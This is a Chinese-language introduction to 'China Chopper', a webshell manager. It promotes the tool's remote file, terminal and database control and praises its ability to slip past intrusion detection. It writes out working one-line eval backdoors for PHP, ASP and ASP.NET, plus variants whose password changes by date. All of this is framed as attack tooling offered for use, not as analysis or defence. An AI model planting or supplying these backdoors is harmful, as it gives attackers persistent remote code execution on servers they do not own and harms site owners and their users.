软件标签:中国菜刀 脚本后门

具体菜刀的来历和发展史我就不都说了。看了感觉很震撼。而且很是敬佩。或许你也听说过一句话木马，但是你不会和菜刀联系起来。自己搜索一下吧。

菜刀功能，非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器，再结合了作者之前的web管理软件等几个工具的优点，实在是大杀器的集合体。

在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码(请注意上例中的pass字串)，选择正确的脚本类型和语言编码，

保存后即可使用文件管理，虚拟终端，数据库管理，自写脚本几大块功能。

1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;

2. 虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份，分别提交。

3. 数据库管理：[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。 如果精通SQL语法，何必还要PHPMYADMIN呢？而且，菜刀还支持任何脚本的数据库管理呢。 (各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)

4. 自写脚本：通过简单编码后提交用户自己的脚本到服务端执行，实现丰富的功能，也可选择发送到浏览器执行。 如果要写自己的CCC脚本，可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本可以在官网下载别人的CCC脚本，或分享你的得意之作。

注意：由于服务器的安全设置，某些功能可能不能正常使用。

　　1）基本信息

　　Eval服务端只需要简单的一行代码，即可用此程序实现常用的管理功能，功能代码二次编码后发送，过IDS的能力大幅提高。

　　目前支持的服务端脚本：PHP, ASP, ASP.NET，并且支持https安全连接的网站。

　　在服务端运行的代码如下：

　　PHP: <?php @eval($_POST['chopper']);?>

　　ASP: <%eval request("chopper")%>

　　ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

(注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)

　　Customize:自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。

此模式可按需定制，比如只要浏览目录，或是只要虚拟终端功能，代码可以很简短。

随日期变化的连接密码, 服务端写法：

Asp.NET:

<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>

PHP:

@eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);

例如：菜刀的密码为chopper，在前面加三个字符,新密码为：{D}chopper